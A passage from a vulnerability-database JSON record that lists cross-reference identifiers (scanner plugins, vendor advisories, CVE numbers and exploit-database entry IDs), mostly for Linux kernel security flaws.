"UBUNTU_USN-3469-2.NASL", "UBUNTU_USN-3487-1.NASL", "UBUNTU_USN-3583-1.NASL", "UBUNTU_USN-3619-1.NASL", "UBUNTU_USN-3619-2.NASL", "UBUNTU_USN-3653-1.NASL", "UBUNTU_USN-3653-2.NASL", "UBUNTU_USN-3655-1.NASL", "UBUNTU_USN-3657-1.NASL", "UBUNTU_USN-3742-1.NASL", "VIRTUOZZO_VZA-2017-017.NASL", "VIRTUOZZO_VZA-2017-025.NASL", "VIRTUOZZO_VZA-2018-041.NASL", "VIRTUOZZO_VZA-2018-050.NASL", "VIRTUOZZO_VZA-2018-052.NASL", "VIRTUOZZO_VZLSA-2017-0293.NASL", "VIRTUOZZO_VZLSA-2017-0294.NASL", "VIRTUOZZO_VZLSA-2017-0323.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105374", "OPENVAS:1361412562310106510", "OPENVAS:1361412562310120008", "OPENVAS:1361412562310120547", "OPENVAS:1361412562310120632", "OPENVAS:1361412562310122851", "OPENVAS:1361412562310122852", "OPENVAS:1361412562310122854", "OPENVAS:1361412562310122855", "OPENVAS:1361412562310122858", "OPENVAS:1361412562310123005", "OPENVAS:1361412562310123031", "OPENVAS:1361412562310123032", "OPENVAS:1361412562310123033", "OPENVAS:1361412562310123034", "OPENVAS:1361412562310123155", "OPENVAS:1361412562310123223", "OPENVAS:1361412562310123230", "OPENVAS:1361412562310123261", "OPENVAS:1361412562310123265", "OPENVAS:1361412562310123266", "OPENVAS:1361412562310123388", "OPENVAS:1361412562310123390", "OPENVAS:1361412562310123391", "OPENVAS:1361412562310123493", "OPENVAS:1361412562310123494", "OPENVAS:1361412562310123495", "OPENVAS:1361412562310123497", "OPENVAS:1361412562310131197", "OPENVAS:1361412562310131198", "OPENVAS:1361412562310131199", "OPENVAS:1361412562310140016", "OPENVAS:1361412562310702906", "OPENVAS:1361412562310703313", "OPENVAS:1361412562310703329", "OPENVAS:1361412562310703448", "OPENVAS:1361412562310703503", "OPENVAS:1361412562310703791", "OPENVAS:1361412562310703945", "OPENVAS:1361412562310704187", "OPENVAS:1361412562310804551", "OPENVAS:1361412562310807219", "OPENVAS:1361412562310807225", "OPENVAS:1361412562310807437", "OPENVAS:1361412562310807465", "OPENVAS:1361412562310841639", "OPENVAS:1361412562310841641", "OPENVAS:1361412562310841644", "OPENVAS:1361412562310841648", "OPENVAS:1361412562310841649", "OPENVAS:1361412562310841655", "OPENVAS:1361412562310841656", "OPENVAS:1361412562310841673", "OPENVAS:1361412562310841674", "OPENVAS:1361412562310841677", "OPENVAS:1361412562310841680", "OPENVAS:1361412562310841734", "OPENVAS:1361412562310841736", "OPENVAS:1361412562310841737", "OPENVAS:1361412562310841738", "OPENVAS:1361412562310841739", "OPENVAS:1361412562310841740", "OPENVAS:1361412562310841743", "OPENVAS:1361412562310841744", "OPENVAS:1361412562310841747", "OPENVAS:1361412562310841748", "OPENVAS:1361412562310841749", "OPENVAS:1361412562310841847", "OPENVAS:1361412562310841852", "OPENVAS:1361412562310841893", "OPENVAS:1361412562310841899", "OPENVAS:1361412562310841902", "OPENVAS:1361412562310841903", "OPENVAS:1361412562310841904", "OPENVAS:1361412562310841907", "OPENVAS:1361412562310841998", "OPENVAS:1361412562310841999", "OPENVAS:1361412562310842002", "OPENVAS:1361412562310842003", "OPENVAS:1361412562310842058", "OPENVAS:1361412562310842108", "OPENVAS:1361412562310842109", "OPENVAS:1361412562310842110", "OPENVAS:1361412562310842111", "OPENVAS:1361412562310842113", "OPENVAS:1361412562310842115", "OPENVAS:1361412562310842116", "OPENVAS:1361412562310842379", "OPENVAS:1361412562310842380", "OPENVAS:1361412562310842381", "OPENVAS:1361412562310842383", "OPENVAS:1361412562310842384", "OPENVAS:1361412562310842411", "OPENVAS:1361412562310842414", "OPENVAS:1361412562310842451", "OPENVAS:1361412562310842603", "OPENVAS:1361412562310842605", "OPENVAS:1361412562310842606", "OPENVAS:1361412562310842608", "OPENVAS:1361412562310842609", "OPENVAS:1361412562310842610", "OPENVAS:1361412562310842611", "OPENVAS:1361412562310842612", "OPENVAS:1361412562310842622", "OPENVAS:1361412562310842624", "OPENVAS:1361412562310842627", "OPENVAS:1361412562310842629", "OPENVAS:1361412562310842631", "OPENVAS:1361412562310842649", "OPENVAS:1361412562310842655", "OPENVAS:1361412562310842656", "OPENVAS:1361412562310842666", "OPENVAS:1361412562310842669", "OPENVAS:1361412562310842686", "OPENVAS:1361412562310842687", "OPENVAS:1361412562310842707", "OPENVAS:1361412562310842708", "OPENVAS:1361412562310842709", "OPENVAS:1361412562310842710", "OPENVAS:1361412562310842711", "OPENVAS:1361412562310842712", "OPENVAS:1361412562310842713", "OPENVAS:1361412562310842735", "OPENVAS:1361412562310842741", "OPENVAS:1361412562310842779", "OPENVAS:1361412562310842797", "OPENVAS:1361412562310842852", "OPENVAS:1361412562310842853", "OPENVAS:1361412562310842856", "OPENVAS:1361412562310842859", "OPENVAS:1361412562310842860", "OPENVAS:1361412562310843060", "OPENVAS:1361412562310843061", "OPENVAS:1361412562310843062", "OPENVAS:1361412562310843063", "OPENVAS:1361412562310843064", "OPENVAS:1361412562310843065", "OPENVAS:1361412562310843212", "OPENVAS:1361412562310843232", "OPENVAS:1361412562310843354", "OPENVAS:1361412562310843358", "OPENVAS:1361412562310843376", "OPENVAS:1361412562310843461", "OPENVAS:1361412562310843496", "OPENVAS:1361412562310843497", "OPENVAS:1361412562310843528", "OPENVAS:1361412562310843529", "OPENVAS:1361412562310843532", "OPENVAS:1361412562310843534", "OPENVAS:1361412562310843616", "OPENVAS:1361412562310850586", "OPENVAS:1361412562310850587", "OPENVAS:1361412562310850598", "OPENVAS:1361412562310850605", "OPENVAS:1361412562310850626", "OPENVAS:1361412562310850628", "OPENVAS:1361412562310850649", "OPENVAS:1361412562310850670", "OPENVAS:1361412562310850675", "OPENVAS:1361412562310850746", "OPENVAS:1361412562310850750", "OPENVAS:1361412562310850762", "OPENVAS:1361412562310850776", "OPENVAS:1361412562310850805", "OPENVAS:1361412562310850817", "OPENVAS:1361412562310850818", "OPENVAS:1361412562310850821", "OPENVAS:1361412562310850840", "OPENVAS:1361412562310850881", "OPENVAS:1361412562310850918", "OPENVAS:1361412562310851057", "OPENVAS:1361412562310851080", "OPENVAS:1361412562310851161", "OPENVAS:1361412562310851176", "OPENVAS:1361412562310851179", "OPENVAS:1361412562310851197", "OPENVAS:1361412562310851215", "OPENVAS:1361412562310851242", "OPENVAS:1361412562310851273", "OPENVAS:1361412562310851367", "OPENVAS:1361412562310851386", "OPENVAS:1361412562310851390", "OPENVAS:1361412562310851444", "OPENVAS:1361412562310851515", "OPENVAS:1361412562310851516", "OPENVAS:1361412562310851548", "OPENVAS:1361412562310851863", "OPENVAS:1361412562310852048", "OPENVAS:1361412562310867043", "OPENVAS:1361412562310867054", "OPENVAS:1361412562310867089", "OPENVAS:1361412562310867096", "OPENVAS:1361412562310867119", "OPENVAS:1361412562310867183", "OPENVAS:1361412562310867240", "OPENVAS:1361412562310867242", "OPENVAS:1361412562310867520", "OPENVAS:1361412562310867522", "OPENVAS:1361412562310867546", "OPENVAS:1361412562310867553", "OPENVAS:1361412562310867580", "OPENVAS:1361412562310867583", "OPENVAS:1361412562310867638", "OPENVAS:1361412562310867651", "OPENVAS:1361412562310867663", "OPENVAS:1361412562310867680", "OPENVAS:1361412562310867682", "OPENVAS:1361412562310867773", "OPENVAS:1361412562310867774", "OPENVAS:1361412562310867811", "OPENVAS:1361412562310867820", "OPENVAS:1361412562310867852", "OPENVAS:1361412562310867857", "OPENVAS:1361412562310867886", "OPENVAS:1361412562310867905", "OPENVAS:1361412562310867911", "OPENVAS:1361412562310867939", "OPENVAS:1361412562310867967", "OPENVAS:1361412562310867986", "OPENVAS:1361412562310868019", "OPENVAS:1361412562310868055", "OPENVAS:1361412562310868076", "OPENVAS:1361412562310868101", "OPENVAS:1361412562310868102", "OPENVAS:1361412562310868149", "OPENVAS:1361412562310868196", "OPENVAS:1361412562310868351", "OPENVAS:1361412562310868403", "OPENVAS:1361412562310868416", "OPENVAS:1361412562310868434", "OPENVAS:1361412562310868437", "OPENVAS:1361412562310868489", "OPENVAS:1361412562310868501", "OPENVAS:1361412562310868583", "OPENVAS:1361412562310868627", "OPENVAS:1361412562310868851", "OPENVAS:1361412562310868859", "OPENVAS:1361412562310868914", "OPENVAS:1361412562310868920", "OPENVAS:1361412562310868954", "OPENVAS:1361412562310868980", "OPENVAS:1361412562310868984", "OPENVAS:1361412562310869077", "OPENVAS:1361412562310869091", "OPENVAS:1361412562310869115", "OPENVAS:1361412562310869136", "OPENVAS:1361412562310869213", "OPENVAS:1361412562310869281", "OPENVAS:1361412562310869284", "OPENVAS:1361412562310869369", "OPENVAS:1361412562310869374", "OPENVAS:1361412562310869392", "OPENVAS:1361412562310869459", "OPENVAS:1361412562310869476", "OPENVAS:1361412562310869857", "OPENVAS:1361412562310869889", "OPENVAS:1361412562310871097", "OPENVAS:1361412562310871192", "OPENVAS:1361412562310871426", "OPENVAS:1361412562310871452", "OPENVAS:1361412562310871541", "OPENVAS:1361412562310871546", "OPENVAS:1361412562310871611", "OPENVAS:1361412562310871708", "OPENVAS:1361412562310871761", "OPENVAS:1361412562310871762", "OPENVAS:1361412562310871765", "OPENVAS:1361412562310871783", "OPENVAS:1361412562310872418", "OPENVAS:1361412562310872419", "OPENVAS:1361412562310881832", "OPENVAS:1361412562310881955", "OPENVAS:1361412562310882245", "OPENVAS:1361412562310882285", "OPENVAS:1361412562310882369", "OPENVAS:1361412562310882377", "OPENVAS:1361412562310882664", "OPENVAS:1361412562310882665", "OPENVAS:1361412562310882668", "OPENVAS:1361412562310882674", "OPENVAS:1361412562310882836", "OPENVAS:1361412562310883251", "OPENVAS:1361412562310890833", "OPENVAS:1361412562310891369", "OPENVAS:1361412562311220161020", "OPENVAS:1361412562311220171056", "OPENVAS:1361412562311220171057", "OPENVAS:1361412562311220171122", "OPENVAS:1361412562311220171123", "OPENVAS:1361412562311220171271", "OPENVAS:1361412562311220171292", "OPENVAS:1361412562311220181054", "OPENVAS:1361412562311220181133", "OPENVAS:1361412562311220181246", "OPENVAS:1361412562311220181360", "OPENVAS:1361412562311220181369", "OPENVAS:1361412562311220181406", "OPENVAS:1361412562311220191475", "OPENVAS:1361412562311220191477", "OPENVAS:1361412562311220191479", "OPENVAS:1361412562311220191480", "OPENVAS:1361412562311220191485", "OPENVAS:1361412562311220191488", "OPENVAS:1361412562311220191489", "OPENVAS:1361412562311220191491", "OPENVAS:1361412562311220191494", "OPENVAS:1361412562311220191499", "OPENVAS:1361412562311220191501", "OPENVAS:1361412562311220191502", "OPENVAS:702906", "OPENVAS:703313", "OPENVAS:703329", "OPENVAS:703448", "OPENVAS:703503", "OPENVAS:703791", "OPENVAS:804551", "OPENVAS:841639", "OPENVAS:841641", "OPENVAS:841644", "OPENVAS:841648", "OPENVAS:841649", "OPENVAS:841655", "OPENVAS:841656", "OPENVAS:841673", "OPENVAS:841674", "OPENVAS:841677", "OPENVAS:841680", "OPENVAS:841734", "OPENVAS:841736", "OPENVAS:841737", "OPENVAS:841738", "OPENVAS:841739", "OPENVAS:841740", "OPENVAS:841743", "OPENVAS:841744", "OPENVAS:841747", "OPENVAS:841748", "OPENVAS:841749", "OPENVAS:867043", "OPENVAS:867054", "OPENVAS:867089", "OPENVAS:867096", "OPENVAS:867119", "OPENVAS:867183", "OPENVAS:867240", "OPENVAS:867242", "OPENVAS:867520", "OPENVAS:867522", "OPENVAS:867546", "OPENVAS:867553", "OPENVAS:867580", "OPENVAS:867583", "OPENVAS:867638", "OPENVAS:867651", "OPENVAS:867663", "OPENVAS:867680", "OPENVAS:867682", "OPENVAS:867773", "OPENVAS:867774", "OPENVAS:871097", "OPENVAS:881832"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2018"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-1801", "ELSA-2013-2587", "ELSA-2013-2588", "ELSA-2013-2589", "ELSA-2014-0771", "ELSA-2014-1971", "ELSA-2014-3002", "ELSA-2014-3042", "ELSA-2014-3043", "ELSA-2014-3084", "ELSA-2014-3085", "ELSA-2014-3086", "ELSA-2014-3104", "ELSA-2015-1623", "ELSA-2015-1778", "ELSA-2015-3012", "ELSA-2015-3071", "ELSA-2015-3072", "ELSA-2015-3073", "ELSA-2016-0045", "ELSA-2016-0045-1", "ELSA-2016-0064", "ELSA-2016-0185", "ELSA-2016-0855", "ELSA-2016-2574", "ELSA-2016-3509", "ELSA-2016-3510", "ELSA-2016-3596", "ELSA-2016-3644", "ELSA-2017-0293", "ELSA-2017-0294", "ELSA-2017-0294-1", "ELSA-2017-0307", "ELSA-2017-0323", "ELSA-2017-0323-1", "ELSA-2017-0817", "ELSA-2017-0933", "ELSA-2017-3520", "ELSA-2017-3521", "ELSA-2017-3522", "ELSA-2017-3534", "ELSA-2017-3567", "ELSA-2017-3640", "ELSA-2017-3651", "ELSA-2017-3659", "ELSA-2018-0151", "ELSA-2018-1062", "ELSA-2018-1854", "ELSA-2018-3083", "ELSA-2018-4114", "ELSA-2018-4164", "ELSA-2018-4196", "ELSA-2018-4211", "ELSA-2018-4214", "ELSA-2019-4642", "ELSA-2019-4742", "ELSA-2020-2430", "ELSA-2021-9486", "ELSA-2021-9487"]}, {"type": "osv", "idList": ["OSV:DLA-0015-1", "OSV:DLA-1369-1", "OSV:DLA-155-1", "OSV:DLA-310-1", "OSV:DLA-412-1", "OSV:DLA-439-1", "OSV:DLA-833-1", "OSV:DSA-2906-1", "OSV:DSA-3313-1", "OSV:DSA-3329-1", "OSV:DSA-3448-1", "OSV:DSA-3503-1", "OSV:DSA-3791-1", "OSV:DSA-3945-1", "OSV:DSA-4187-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:135330", "PACKETSTORM:141331", "PACKETSTORM:141339", "PACKETSTORM:148867"]}, {"type": "paloalto", "idList": ["PAN-SA-2016-0025"]}, {"type": "photon", "idList": ["PHSA-2017-0005", "PHSA-2017-0078", "PHSA-2017-0091", "PHSA-2018-0116", "PHSA-2018-0122", "PHSA-2018-1.0-0122", "PHSA-2019-0122"]}, {"type": "redhat", "idList": ["RHSA-2013:1801", "RHSA-2013:1802", "RHSA-2014:0100", "RHSA-2014:0284", "RHSA-2014:0439", "RHSA-2014:0771", "RHSA-2014:0815", "RHSA-2014:1318", "RHSA-2014:1971", "RHSA-2015:1623", "RHSA-2015:1778", "RHSA-2015:1787", "RHSA-2015:1788", "RHSA-2016:0045", "RHSA-2016:0064", "RHSA-2016:0065", "RHSA-2016:0068", "RHSA-2016:0103", "RHSA-2016:0855", "RHSA-2016:1096", "RHSA-2016:1100", "RHSA-2016:1225", "RHSA-2016:2574", "RHSA-2016:2584", "RHSA-2017:0293", "RHSA-2017:0294", "RHSA-2017:0295", "RHSA-2017:0316", "RHSA-2017:0323", "RHSA-2017:0324", "RHSA-2017:0345", "RHSA-2017:0346", "RHSA-2017:0347", "RHSA-2017:0365", "RHSA-2017:0366", "RHSA-2017:0403", "RHSA-2017:0501", "RHSA-2017:0817", "RHSA-2017:0932", "RHSA-2017:1209", "RHSA-2018:0151", "RHSA-2018:0152", "RHSA-2018:0181", "RHSA-2018:0654", "RHSA-2018:0676", "RHSA-2018:1062", "RHSA-2018:1854", "RHSA-2018:2948", "RHSA-2018:3083", "RHSA-2018:3096", "RHSA-2018:3459", "RHSA-2018:3540", "RHSA-2018:3586", "RHSA-2018:3590", "RHSA-2018:3591", "RHSA-2019:4154", "RHSA-2020:2430"]}, {"type": "redhatcve", "idList": ["RH:CVE-2014-9410", "RH:CVE-2016-10318", "RH:CVE-2017-12192", "RH:CVE-2017-18203", "RH:CVE-2017-18344"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29995", "SECURITYVULNS:DOC:30048", "SECURITYVULNS:DOC:30431", "SECURITYVULNS:DOC:30929", "SECURITYVULNS:DOC:31142", "SECURITYVULNS:DOC:31315", "SECURITYVULNS:DOC:31502", "SECURITYVULNS:DOC:32350", "SECURITYVULNS:DOC:32352", "SECURITYVULNS:VULN:13400", "SECURITYVULNS:VULN:13438", "SECURITYVULNS:VULN:13475", "SECURITYVULNS:VULN:13844", "SECURITYVULNS:VULN:13997", "SECURITYVULNS:VULN:14579"]}, {"type": "seebug", "idList": ["SSV:61934", "SSV:62031", "SSV:90673", "SSV:91603", "SSV:92700"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2014:0677-1", "OPENSUSE-SU-2014:0678-1", "OPENSUSE-SU-2014:0957-1", "OPENSUSE-SU-2014:0985-1", "OPENSUSE-SU-2014:1669-1", "OPENSUSE-SU-2014:1677-1", "OPENSUSE-SU-2015:0566-1", "OPENSUSE-SU-2015:0713-1", "OPENSUSE-SU-2015:0714-1", "OPENSUSE-SU-2015:1382-1", "OPENSUSE-SU-2016:0280-1", "OPENSUSE-SU-2016:0301-1", "OPENSUSE-SU-2016:0318-1", "OPENSUSE-SU-2016:0537-1", "OPENSUSE-SU-2016:1008-1", "OPENSUSE-SU-2016:1798-1", "OPENSUSE-SU-2016:2144-1", "OPENSUSE-SU-2016:2290-1", "OPENSUSE-SU-2016:2649-1", "OPENSUSE-SU-2016:3021-1", "OPENSUSE-SU-2017:0541-1", "OPENSUSE-SU-2017:0547-1", "OPENSUSE-SU-2017:1215-1", "OPENSUSE-SU-2018:2242-1", "OPENSUSE-SU-2018:2404-1", "SUSE-SU-2014:0459-1", "SUSE-SU-2014:0531-1", "SUSE-SU-2014:0536-1", "SUSE-SU-2014:0537-1", "SUSE-SU-2014:0696-1", "SUSE-SU-2014:0807-1", "SUSE-SU-2014:0908-1", "SUSE-SU-2014:0909-1", "SUSE-SU-2014:0910-1", "SUSE-SU-2014:0911-1", "SUSE-SU-2014:0912-1", "SUSE-SU-2014:1693-1", "SUSE-SU-2014:1693-2", "SUSE-SU-2014:1695-1", "SUSE-SU-2014:1695-2", "SUSE-SU-2015:0481-1", "SUSE-SU-2015:0581-1", "SUSE-SU-2015:0736-1", "SUSE-SU-2015:0812-1", "SUSE-SU-2015:1224-1", "SUSE-SU-2015:1324-1", "SUSE-SU-2015:1478-1", "SUSE-SU-2015:1487-1", "SUSE-SU-2015:1488-1", "SUSE-SU-2015:1489-1", "SUSE-SU-2015:1490-1", "SUSE-SU-2015:1491-1", "SUSE-SU-2015:1592-1", "SUSE-SU-2015:1611-1", "SUSE-SU-2016:0186-1", "SUSE-SU-2016:0205-1", "SUSE-SU-2016:0341-1", "SUSE-SU-2016:0585-1", "SUSE-SU-2016:0745-1", "SUSE-SU-2016:0746-1", "SUSE-SU-2016:0747-1", "SUSE-SU-2016:0750-1", "SUSE-SU-2016:0751-1", "SUSE-SU-2016:0752-1", "SUSE-SU-2016:0753-1", "SUSE-SU-2016:0755-1", "SUSE-SU-2016:0756-1", "SUSE-SU-2016:0757-1", "SUSE-SU-2016:0785-1", "SUSE-SU-2016:0911-1", "SUSE-SU-2016:1019-1", "SUSE-SU-2016:1031-1", "SUSE-SU-2016:1032-1", "SUSE-SU-2016:1033-1", "SUSE-SU-2016:1034-1", "SUSE-SU-2016:1035-1", "SUSE-SU-2016:1037-1", "SUSE-SU-2016:1038-1", "SUSE-SU-2016:1039-1", "SUSE-SU-2016:1040-1", "SUSE-SU-2016:1041-1", "SUSE-SU-2016:1045-1", "SUSE-SU-2016:1046-1", "SUSE-SU-2016:1102-1", "SUSE-SU-2016:1203-1", "SUSE-SU-2016:1764-1", "SUSE-SU-2016:2074-1", "SUSE-SU-2016:3304-1", "SUSE-SU-2017:1183-1", "SUSE-SU-2017:1247-1", "SUSE-SU-2017:1301-1", "SUSE-SU-2017:1360-1", "SUSE-SU-2017:1990-1", "SUSE-SU-2017:2342-1", "SUSE-SU-2017:2525-1", "SUSE-SU-2017:2908-1", "SUSE-SU-2017:2920-1", "SUSE-SU-2017:3165-1", "SUSE-SU-2017:3265-1", "SUSE-SU-2018:0040-1", "SUSE-SU-2018:1080-1", "SUSE-SU-2018:1172-1", "SUSE-SU-2018:1220-1", "SUSE-SU-2018:1221-1"]}, {"type": "symantec", "idList": ["SMNTC-1349"]}, {"type": "thn", "idList": ["THN:11E7CC33794D9968747131F3F0AE8716", "THN:2F321B0D3CF635D0F8D272948E9B31C9"]}, {"type": "threatpost", "idList": ["THREATPOST:178E0668804E2DA1322D2C1DCF6CA893", "THREATPOST:3457E4B368AF24E94CB5545AC02382A8", "THREATPOST:45807D1856E34DEFF51A771D0E730AA3", "THREATPOST:AAD833DA9CB72C65E36AA2758E011A09", "THREATPOST:C5F01C375D7DB776A2A5902570B2E5FD"]}, {"type": "ubuntu", "idList": ["USN-2040-1", "USN-2042-1", "USN-2043-1", "USN-2044-1", "USN-2046-1", "USN-2049-1", "USN-2050-1", "USN-2066-1", "USN-2067-1", "USN-2069-1", "USN-2073-1", "USN-2128-1", "USN-2129-1", "USN-2133-1", "USN-2134-1", "USN-2135-1", "USN-2136-1", "USN-2137-1", "USN-2138-1", "USN-2139-1", "USN-2140-1", "USN-2141-1", "USN-2233-1", "USN-2234-1", "USN-2283-1", "USN-2284-1", "USN-2285-1", "USN-2286-1", "USN-2287-1", "USN-2289-1", "USN-2376-1", "USN-2377-1", "USN-2378-1", "USN-2379-1", "USN-2441-1", "USN-2442-1", "USN-2443-1", "USN-2445-1", "USN-2446-1", "USN-2447-1", "USN-2447-2", "USN-2448-1", "USN-2448-2", "USN-2464-1", "USN-2515-1", "USN-2515-2", "USN-2516-1", "USN-2516-2", "USN-2516-3", "USN-2517-1", "USN-2518-1", "USN-2680-1", "USN-2681-1", "USN-2682-1", "USN-2683-1", "USN-2684-1", "USN-2685-1", "USN-2713-1", "USN-2714-1", "USN-2870-1", "USN-2870-2", "USN-2871-1", "USN-2871-2", "USN-2872-1", "USN-2872-2", "USN-2872-3", "USN-2873-1", "USN-2889-1", "USN-2889-2", "USN-2890-1", "USN-2890-2", "USN-2890-3", "USN-2908-1", "USN-2908-2", "USN-2908-3", "USN-2908-4", "USN-2908-5", "USN-2931-1", "USN-2932-1", "USN-2946-1", "USN-2946-2", "USN-2947-1", "USN-2947-2", "USN-2947-3", "USN-2948-1", "USN-2948-2", "USN-2949-1", "USN-2967-1", "USN-2967-2", "USN-2989-1", "USN-2998-1", "USN-3053-1", "USN-3054-1", "USN-3055-1", "USN-3056-1", "USN-3057-1", "USN-3206-1", "USN-3207-1", "USN-3207-2", "USN-3208-1", "USN-3208-2", "USN-3209-1", "USN-3343-1", "USN-3343-2", "USN-3469-1", "USN-3469-2", "USN-3487-1", "USN-3583-1", "USN-3583-2", "USN-3619-1", "USN-3619-2", "USN-3653-1", "USN-3653-2", "USN-3655-1", "USN-3655-2", "USN-3657-1", "USN-3742-1", "USN-3742-2", "USN-3742-3"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-4470", "UB:CVE-2014-0131", "UB:CVE-2014-1874", "UB:CVE-2014-3181", "UB:CVE-2014-8134", "UB:CVE-2014-9410", "UB:CVE-2014-9428", "UB:CVE-2014-9940", "UB:CVE-2015-5327", "UB:CVE-2015-5364", "UB:CVE-2015-5366", "UB:CVE-2015-8787", "UB:CVE-2015-8812", "UB:CVE-2016-0728", "UB:CVE-2016-10318", "UB:CVE-2016-2069", "UB:CVE-2016-4794", "UB:CVE-2017-12192", "UB:CVE-2017-15274", "UB:CVE-2017-18203", "UB:CVE-2017-18344", "UB:CVE-2017-6074"]}, {"type": "virtuozzo", "idList": ["VZA-2017-016", "VZA-2017-017", "VZA-2017-024", "VZA-2017-025", "VZA-2018-040", "VZA-2018-041", "VZA-2018-050", "VZA-2018-052"]}, {"type": "zdt", "idList": ["1337DAY-ID-25516", "1337DAY-ID-25517", "1337DAY-ID-27133", "1337DAY-ID-27134", "1337DAY-ID-30863"]}]}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2017-914"]}, {"type": "android", "idList": ["ANDROID:CVE-2016-0728"]}, {"type": "androidsecurity", "idList": ["ANDROID:2016-12-01"]}, {"type": "archlinux", "idList": ["ASA-201601-20", "ASA-201601-26"]}, {"type": "canvas", "idList": ["SHOW_TIMER_LEAK"]}, {"type": "centos", "idList": ["CESA-2017:0293", "CESA-2017:0294", "CESA-2017:0323"]}, {"type": "checkpoint_security", "idList": ["CPS:SK109752"]}, {"type": "cisa", "idList": ["CISA:FCB4B9C4CB605F6B805399E8D3B54A48"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:14981E32944F89BB69AF2D0158A379F0", "CFOUNDRY:59BA3F002F833C86F9D716E2A3575DCB"]}, {"type": "cve", "idList": ["CVE-2013-4470", "CVE-2014-0131", "CVE-2015-8787", "CVE-2017-12192", "CVE-2017-18203", "CVE-2017-6074"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1369-1:33F82", "DEBIAN:DSA-3791-1:AE0FD", "DEBIAN:DSA-3945-1:532A6", "DEBIAN:DSA-4187-1:481CA"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2013-4470", "DEBIANCVE:CVE-2014-0131", "DEBIANCVE:CVE-2014-1874", "DEBIANCVE:CVE-2014-3181", "DEBIANCVE:CVE-2014-8134", "DEBIANCVE:CVE-2014-9428", "DEBIANCVE:CVE-2014-9940", "DEBIANCVE:CVE-2015-5327", "DEBIANCVE:CVE-2015-5364", "DEBIANCVE:CVE-2015-8787", "DEBIANCVE:CVE-2015-8812", "DEBIANCVE:CVE-2016-0728", "DEBIANCVE:CVE-2016-10318", "DEBIANCVE:CVE-2016-2069", "DEBIANCVE:CVE-2016-4794", "DEBIANCVE:CVE-2017-12192", "DEBIANCVE:CVE-2017-18203", "DEBIANCVE:CVE-2017-18344", "DEBIANCVE:CVE-2017-6074"]}, {"type": "exploitdb", "idList": ["EDB-ID:41457", "EDB-ID:41458"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4EEB4BE9E101A3B6E5FA4A3FC9B06CCD"]}, {"type": "f5", "idList": ["F5:K82508682", "SOL01948202", "SOL15699", "SOL17307"]}, {"type": "fedora", "idList": ["FEDORA:1F466601E823", "FEDORA:6437E61257FA", "FEDORA:E7CE72245B"]}, {"type": "hackerone", "idList": ["H1:347282"]}, {"type": "ibm", "idList": ["658C6A388449448220E16F3A05A122A56F35F4A9A9370C4B63DC0779B971B6CE"]}, {"type": "kitploit", "idList": ["KITPLOIT:4462385753504235463"]}, {"type": "lenovo", "idList": ["LENOVO:PS500107-NOSID"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/F5-BIG-IP-CVE-2017-6074/", "MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2017-6074/", "MSF:ILITIES/SUSE-CVE-2017-6074/", "MSF:ILITIES/UBUNTU-USN-2378-1/"]}, {"type": "myhack58", "idList": ["MYHACK58:62201783679", "MYHACK58:62201783692"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2013-1801.NASL", "CENTOS_RHSA-2017-0293.NASL", "CENTOS_RHSA-2017-0294.NASL", "CENTOS_RHSA-2017-0323.NASL", "DEBIAN_DLA-412.NASL", "DEBIAN_DSA-3791.NASL", "F5_BIGIP_SOL17309.NASL", "FEDORA_2014-17283.NASL", "FEDORA_2016-2F25D12C51.NASL", "FEDORA_2016-7E12AE5359.NASL", "FEDORA_2016-9FBE2C258B.NASL", "FEDORA_2016-E7162262B0.NASL", "FEDORA_2017-4B9F61C68D.NASL", "FEDORA_2017-F519EBB3C4.NASL", "OPENSUSE-2015-301.NASL", "OPENSUSE-2016-256.NASL", "OPENSUSE-2017-286.NASL", "OPENSUSE-2017-287.NASL", "ORACLELINUX_ELSA-2016-3509.NASL", "ORACLELINUX_ELSA-2017-0293.NASL", "ORACLELINUX_ELSA-2017-0294.NASL", "ORACLELINUX_ELSA-2017-0323.NASL", "ORACLELINUX_ELSA-2017-3520.NASL", "ORACLELINUX_ELSA-2017-3521.NASL", "ORACLELINUX_ELSA-2017-3522.NASL", "ORACLELINUX_ELSA-2019-4642.NASL", "ORACLELINUX_ELSA-2019-4742.NASL", "ORACLEVM_OVMSA-2017-0044.NASL", "ORACLEVM_OVMSA-2017-0045.NASL", "ORACLEVM_OVMSA-2017-0046.NASL", "ORACLEVM_OVMSA-2019-0022.NASL", "REDHAT-RHSA-2016-0064.NASL", "REDHAT-RHSA-2017-0293.NASL", "REDHAT-RHSA-2017-0294.NASL", "REDHAT-RHSA-2017-0295.NASL", "REDHAT-RHSA-2017-0316.NASL", "REDHAT-RHSA-2017-0323.NASL", "REDHAT-RHSA-2017-0324.NASL", "REDHAT-RHSA-2017-0345.NASL", "REDHAT-RHSA-2017-0346.NASL", "REDHAT-RHSA-2017-0347.NASL", "REDHAT-RHSA-2017-0365.NASL", "REDHAT-RHSA-2017-0366.NASL", "REDHAT-RHSA-2017-0403.NASL", "REDHAT-RHSA-2017-0501.NASL", "REDHAT-RHSA-2018-2948.NASL", "SL_20170222_KERNEL_ON_SL6_X.NASL", "SL_20170222_KERNEL_ON_SL7_X.NASL", "SL_20170224_KERNEL_ON_SL5_X.NASL", "SUSE_SU-2018-0040-1.NASL", "UBUNTU_USN-2447-1.NASL", "UBUNTU_USN-2681-1.NASL", "UBUNTU_USN-2908-1.NASL", "UBUNTU_USN-2908-2.NASL", "UBUNTU_USN-2908-3.NASL", "UBUNTU_USN-2908-4.NASL", "UBUNTU_USN-2908-5.NASL", "UBUNTU_USN-2931-1.NASL", "UBUNTU_USN-3208-1.NASL", "UBUNTU_USN-3208-2.NASL", "UBUNTU_USN-3209-1.NASL", "UBUNTU_USN-3583-1.NASL", "VIRTUOZZO_VZLSA-2017-0293.NASL", 